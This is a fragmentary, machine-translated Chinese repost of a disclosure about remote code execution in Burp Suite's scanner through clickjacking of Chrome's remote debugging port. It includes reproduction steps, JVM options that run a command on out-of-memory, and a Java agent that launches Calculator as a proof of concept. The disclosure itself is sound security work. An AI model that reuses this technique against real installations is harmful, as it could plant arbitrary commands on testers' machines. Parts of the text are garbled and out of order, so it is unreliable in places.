/Applications/Burp Suite Professional.app/Contents/
新user.vmoptions
文件下载到目录的操作。这将在下次启动 Burp Suite 时向 JVM提供-Xmx5m
和标志。-XX:OnOutOfMemoryError=open -a Calculator
因此,Burp Suite 将快速耗尽可用的 JVM 内存并触发提供的操作系统命令。--remote-debugging
和--headless
) [1] 。此外,该 PoC 中使用的 XSS 向量至少自 2016 年起就已向 Chrome 公开,并在多个票证中进行了报告[2-6] 。因此,我们将此报告为 Burp Suite 漏洞,因为可以利用命名管道传输来缓解此问题,而 puppeteer(例如)[ --remote-debugging-pipe
7 ]等工具支持这一点。概念验证:
重现步骤:
-
下载附加的“burp.html”漏洞利用程序,并将其托管在网络服务器上(例如
python -m http.server
) -
启动 Burp Suite 的实例,并开始对 Web 服务器进行新的扫描。
-
打开 Chrome 浏览器并导航到托管漏洞利用页面(例如http://127.0.0.1:8000/burp.html)
-
观察 JavaScript 端口扫描器正在确定用于 Chrome 远程调试的随机端口侦听。识别端口后,页面上将呈现点击劫持负载。
-
点击“点击我!!!”后 按钮,重新启动 Burp Suite 并观察计算器应用程序已启动。
影响
-Xmx5m
and 。-XX:OnOutOfMemoryError=
-javaagent:agent.jar
import java.io.*;
import java.lang.instrument.*;
public class Hax {
public static void premain(String args, Instrumentation inst) {
try {
Process p = Runtime.getRuntime().exec("open -a Calculator");
}
catch (Exception err) {
err.printStackTrace();
}
}
}
参考:
[1]https://chromium.googlesource.com/chromium/src/+/HEAD/docs/security/security-labels.md#TOC-Security_Impact-None
[2]https://bugs.chromium.org/p /chromium/issues/detail?id=607939
[3]https://bugs.chromium.org/p/chromium/issues/detail?id=618333
[4]https://bugs.chromium.org/p/chromium /issues/detail?id=619414
[5]https://bugs.chromium.org/p/chromium/issues/detail?id=775527
[6]https://bugs.chromium.org/p/chromium/issues /detail?id=798163
[7]https://github.com/puppeteer/puppeteer/blob/943477cc1eb4b129870142873b3554737d5ef252/src/node/PipeTransport.ts
点击阅读原文-跳转到原文地址漏洞报告-报告内含附件
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):Burp Suite 通过点击劫持的 Burp Scanner / Crawler 的 RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论